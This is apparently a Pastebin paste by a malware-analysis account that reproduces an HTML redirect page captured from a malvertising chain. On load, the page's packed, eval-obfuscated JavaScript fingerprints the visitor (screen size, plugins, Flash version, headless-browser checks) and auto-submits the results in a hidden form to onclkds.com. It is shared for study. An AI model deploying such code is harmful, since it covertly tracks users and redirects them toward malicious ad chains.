Advertisement
MalwareBreakdown

Original full file

Feb 19th, 2017
12,402
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.56 KB | None | 0 0
  1. <!doctype html>
  2. <html lang="en" xmlns="http://www.w3.org/1999/html">
  3. <head>
  4. <meta charset="UTF-8">
  5. <title>Redirect</title>
  6. <link rel="dns-prefetch" href="//avatrading.org" />
  7. <noscript><meta id="meta-refresh" http-equiv="refresh" content="1; url=/?r=/mb/han&zoneid=7904&pbk2=998ee3e7778d90e04db5276995ddb7636388366283489244896&zoneid=7904&uuid=20950899-f385-4e08-9179-7f55bf462380&fs=1&ad_scheme=1&rotation_type=3&adparams=bm9qcz0xJnNhdmVkX3JlZmVyZXI9aHR0cCUzQSUyRiUyRm11bHRpbWVkaWF6Lm5ldCUyRg%3D%3D"></noscript>
  8. <style>
  9. .click {color: white;display:none;}
  10. </style>
  11.  
  12. </head>
  13. <body>
  14.  
  15.  
  16. <form action="//onclkds.com/" method="get" id="submit-form">
  17. <input type="hidden" name="r" value="/mb/han" />
  18. <input type="hidden" name="zoneid" value="7904" />
  19. <input type="hidden" name="pbk2" value="998ee3e7778d90e04db5276995ddb7636388366283489244896" />
  20. <input type="hidden" name="uuid" value="20950899-f385-4e08-9179-7f55bf462380" />
  21. <input type="hidden" name="fs" value="1" />
  22. <input type="hidden" name="ad_scheme" value="1" />
  23. <input type="hidden" name="rotation_type" value="3" />
  24. <input type="hidden" name="adparams" value="bm9qcz0wJnNhdmVkX3JlZmVyZXI9aHR0cCUzQSUyRiUyRm11bHRpbWVkaWF6Lm5ldCUyRg==" />
  25. <input type="hidden" name="x" value="" id="a" />
  26. <input type="hidden" name="y" value="" id="b" />
  27.  
  28. <input type='hidden' name='sw' value='' id='ci_SW' /><input type='hidden' name='sh' value='' id='ci_SH' /><input type='hidden' name='wx' value='' id='ci_WX' /><input type='hidden' name='wy' value='' id='ci_WY' /><input type='hidden' name='ww' value='' id='ci_WW' /><input type='hidden' name='wh' value='' id='ci_WH' /><input type='hidden' name='wiw' value='' id='ci_WIW' /><input type='hidden' name='wih' value='' id='ci_WIH' /><input type='hidden' name='wfc' value='' id='ci_WFC' /><input type='hidden' name='pl' value='' id='ci_PL' /><input type='hidden' name='np' value='' id='ci_NP' /><input type='hidden' name='pt' value='' id='ci_PT' /><input type='hidden' name='nb' value='' id='ci_NB' /><input type='hidden' name='ng' value='' id='ci_NG' /><input type='hidden' name='dm' value='' id='ci_DM' /><input type='hidden' name='cf' value='' id='ci_CF' /><input type='hidden' name='id' value='d0a3978d8093e9bd0b5b4573d71d3007' id='ci_ID' /><input type='hidden' name='co' value='0' id='ci_co' /><input type='hidden' name='rf' value='1' id='ci_rf' /><input type='hidden' name='hs' value='5d01a8716bbed2e9f5ffbb6af2350352' id='ci_hs' /> <input type="hidden" name="ix" value="" id="ix" />
  29. <input type="hidden" name="fs" value="" id="fs" />
  30. <input type="hidden" name="timeout" value="0" id="timeout" />
  31. </form>
  32. <a href="/index.php?r=/bl&zoneid=7904" class="click">click here</a>
  33.  
  34. <script type="text/javascript">
  35. mTop = top;
  36. mSelf = self;
  37. submited = false;
  38.  
  39. function submit() {
  40.  
  41. if (submited) {
  42. return false;
  43. }
  44.  
  45. submited = true;
  46.  
  47. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('c a;c b;c 6;l(9 4.k!=\'8\'){a=4.k;b=4.m}i l(9 3.5!=\'8\'&&9 3.5.7!=\'8\'&&3.5.7!=0){a=3.5.7;b=3.5.g}i{a=3.j(\'h\')[0].7;b=3.j(\'h\')[0].g}o{6=4.n!==4.q?1:0}p(e){6=2}3.d(\'a\').f=a;3.d(\'b\').f=b;3.d(\'6\').f=6;',27,27,'|||document|window|documentElement|ix|clientWidth|undefined|typeof|||var|getElementById||value|clientHeight|body|else|getElementsByTagName|innerWidth|if|innerHeight|self|try|catch|top'.split('|'),0,{}));
  48.  
  49.  
  50. var flash = 0;
  51. try {
  52. var FlashDetect=new function(){
  53. var self=this;self.installed=false;self.raw="";self.major=-1;self.minor=-1;self.revision=-1;self.revisionStr="";var activeXDetectRules=[{"name":"ShockwaveFlash.ShockwaveFlash.7","version":function(obj){return getActiveXVersion(obj);}},{"name":"ShockwaveFlash.ShockwaveFlash.6","version":function(obj){var version="6,0,21";try{obj.AllowScriptAccess="always";version=getActiveXVersion(obj);}catch(err){}
  54. return version;}},{"name":"ShockwaveFlash.ShockwaveFlash","version":function(obj){return getActiveXVersion(obj);}}];var getActiveXVersion=function(activeXObj){var version=-1;try{version=activeXObj.GetVariable("$version");}catch(err){}
  55. return version;};var getActiveXObject=function(name){var obj=-1;try{obj=new ActiveXObject(name);}catch(err){obj={activeXError:true};}
  56. return obj;};var parseActiveXVersion=function(str){var versionArray=str.split(",");return{"raw":str,"major":parseInt(versionArray[0].split(" ")[1],10),"minor":parseInt(versionArray[1],10),"revision":parseInt(versionArray[2],10),"revisionStr":versionArray[2]};};var parseStandardVersion=function(str){var descParts=str.split(/ +/);var majorMinor=descParts[2].split(/\./);var revisionStr=descParts[3];return{"raw":str,"major":parseInt(majorMinor[0],10),"minor":parseInt(majorMinor[1],10),"revisionStr":revisionStr,"revision":parseRevisionStrToInt(revisionStr)};};var parseRevisionStrToInt=function(str){return parseInt(str.replace(/[a-zA-Z]/g,""),10)||self.revision;};self.majorAtLeast=function(version){return self.major>=version;};self.minorAtLeast=function(version){return self.minor>=version;};self.revisionAtLeast=function(version){return self.revision>=version;};self.versionAtLeast=function(major){var properties=[self.major,self.minor,self.revision];var len=Math.min(properties.length,arguments.length);for(i=0;i<len;i++){if(properties[i]>=arguments[i]){if(i+1<len&&properties[i]==arguments[i]){continue;}else{return true;}}else{return false;}}};self.FlashDetect=function(){if(navigator.plugins&&navigator.plugins.length>0){var type='application/x-shockwave-flash';var mimeTypes=navigator.mimeTypes;if(mimeTypes&&mimeTypes[type]&&mimeTypes[type].enabledPlugin&&mimeTypes[type].enabledPlugin.description){var version=mimeTypes[type].enabledPlugin.description;var versionObj=parseStandardVersion(version);self.raw=versionObj.raw;self.major=versionObj.major;self.minor=versionObj.minor;self.revisionStr=versionObj.revisionStr;self.revision=versionObj.revision;self.installed=true;}}else if(navigator.appVersion.indexOf("Mac")==-1&&window.execScript){var version=-1;for(var i=0;i<activeXDetectRules.length&&version==-1;i++){var obj=getActiveXObject(activeXDetectRules[i].name);if(!obj.activeXError){self.installed=true;version=activeXDetectRules[i].version(obj);if(version!=-1){var versionObj=parseActiveXVersion(version);self.raw=versionObj.raw;self.major=versionObj.major;self.minor=versionObj.minor;self.revision=versionObj.revision;self.revisionStr=versionObj.revisionStr;}}}}}();
  57. };
  58.  
  59. if (FlashDetect.major > 0) {
  60. flash = 1;
  61. }
  62. } catch (e) {
  63. flash = 2;
  64. }
  65.  
  66. window.document.getElementById("fs").value=flash;
  67.  
  68. eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b 4={};8{4.17=n.1b.1p;4.R=n.1b.1p}5(e){4.17=-1;4.R=-1}8{4.S=n.1u;4.X=n.1r}5(e){4.S=-1;4.X=-1}8{4.V=n.1O;4.T=n.1N}5(e){4.V=-1;4.T=-1}8{4.Q=n.1M;4.14=n.1K}5(e){4.Q=-1;4.14=-1}8{4.Y=n.1B.1C.z}5(e){4.Y=-1}8{4.15=f.1D.1A}5(e){4.15=\'-\'}8{4.1j=f.1z}5(e){4.1j=\'-\'}8{4.19=(!(v.G 1w 1x)||v.G.z==0)?0:1}5(e){4.19=-1}8{4.18=n.1y||n.1E}5(e){4.18=\'-\'}8{4.11=1k(v.1F)==="h"?1:0}5(e){4.11=-1}8{4.P=1k(v.1v)!=="1J"?1:0}5(e){4.P=-1}4.H=0;8{b 13=1f h(){b 9=1G;9.N=1c;9.w="";9.p=-1;9.s=-1;9.q=-1;9.r="";b L=[{"C":"A.A.7","c":h(l){m K(l)}},{"C":"A.A.6","c":h(l){b c="6,0,21";8{l.1H="1I";c=K(l)}5(O){}m c}},{"C":"A.A","c":h(l){m K(l)}}];b K=h(1e){b c=-1;8{c=1e.1t("$c")}5(O){}m c};b 1i=h(C){b l=-1;8{l=1f 1q(C)}5(O){l={1n:F}}m l};b 1l=h(t){b D=t.I(",");m{"w":t,"p":B(D[0].I(" ")[1],10),"s":B(D[1],10),"q":B(D[2],10),"r":D[2]}};b 1g=h(t){b 1a=t.I(/ +/);b 16=1a[2].I(/\\./);b r=1a[3];m{"w":t,"p":B(16[0],10),"s":B(16[1],10),"r":r,"q":1o(r)}};b 1o=h(t){m B(t.1s(/[a-1L-Z]/g,""),10)||9.q};9.2f=h(c){m 9.p>=c};9.2g=h(c){m 9.s>=c};9.2e=h(c){m 9.q>=c};9.2d=h(p){b J=[9.p,9.s,9.q];b 12=2a.2b(J.z,M.z);1m(i=0;i<12;i++){u(J[i]>=M[i]){u(i+1<12&&J[i]==M[i]){2i}W{m F}}W{m 1c}}};9.13=h(){u(v.G&&v.G.z>0){b E=\'1P/x-2c-2h\';b y=v.y;u(y&&y[E]&&y[E].U&&y[E].U.1d){b c=y[E].U.1d;b o=1g(c);9.w=o.w;9.p=o.p;9.s=o.s;9.r=o.r;9.q=o.q;9.N=F}}W u(v.2k.2j("29")==-1&&n.1V){b c=-1;1m(b i=0;i<L.z&&c==-1;i++){b l=1i(L[i].C);u(!l.1n){9.N=F;c=L[i].c(l);u(c!=-1){b o=1l(c);9.w=o.w;9.p=o.p;9.s=o.s;9.q=o.q;9.r=o.r}}}}}()};u(13.p>0){4.H=1}}5(e){4.H=2}8{1h(4)}5(e){};h 1h(d){8{f.k(\'1Y\').j=d.17}5(e){}8{f.k(\'1Z\').j=d.R}5(e){}8{f.k(\'26\').j=d.S}5(e){}8{f.k(\'27\').j=d.X}5(e){}8{f.k(\'25\').j=d.V}5(e){}8{f.k(\'24\').j=d.T}5(e){}8{f.k(\'20\').j=d.Q}5(e){}8{f.k(\'22\').j=d.14}5(e){}8{f.k(\'23\').j=d.Y}5(e){}8{f.k(\'1S\').j=d.15}5(e){}8{f.k(\'1R\').j=d.19}5(e){}8{f.k(\'1Q\').j=d.18}5(e){}8{f.k(\'1T\').j=d.11}5(e){}8{f.k(\'1U\').j=d.P}5(e){}8{f.k(\'1X\').j=d.1W}5(e){}8{f.k(\'28\').j=d.H}5(e){}};',62,145,'||||QC|catch|||try|self||var|version|||document||function||value|getElementById|obj|return|window|versionObj|major|revision|revisionStr|minor|str|if|navigator|raw||mimeTypes|length|ShockwaveFlash|parseInt|name|versionArray|type|true|plugins|CF|split|properties|getActiveXVersion|activeXDetectRules|arguments|installed|err|NG|WIW|SH|WX|WH|enabledPlugin|WW|else|WY|WFC|||NB|len|FlashDetect|WIH|PL|majorMinor|SW|PT|NP|descParts|screen|false|description|activeXObj|new|parseStandardVersion|QCDone|getActiveXObject|RF|typeof|parseActiveXVersion|for|activeXError|parseRevisionStrToInt|width|ActiveXObject|screenY|replace|GetVariable|screenX|geolocation|instanceof|PluginArray|callPhantom|referrer|href|top|frames|location|_phantom|sendBeacon|this|AllowScriptAccess|always|undefined|innerHeight|zA|innerWidth|outerHeight|outerWidth|application|ci_PT|ci_NP|ci_PL|ci_NB|ci_NG|execScript|DM|ci_DM|ci_SW|ci_SH|ci_WIW||ci_WIH|ci_WFC|ci_WH|ci_WW|ci_WX|ci_WY|ci_CF|Mac|Math|min|shockwave|versionAtLeast|revisionAtLeast|majorAtLeast|minorAtLeast|flash|continue|indexOf|appVersion'.split('|'),0,{}))
  69.  
  70. window.document.getElementById("submit-form").submit();
  71. }
  72.  
  73. function submitByTimeout(){
  74. window.document.getElementById("timeout").value=1;
  75. submit();
  76. }
  77. submit();
  78.  
  79. </script>
  80. </body>
  81. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement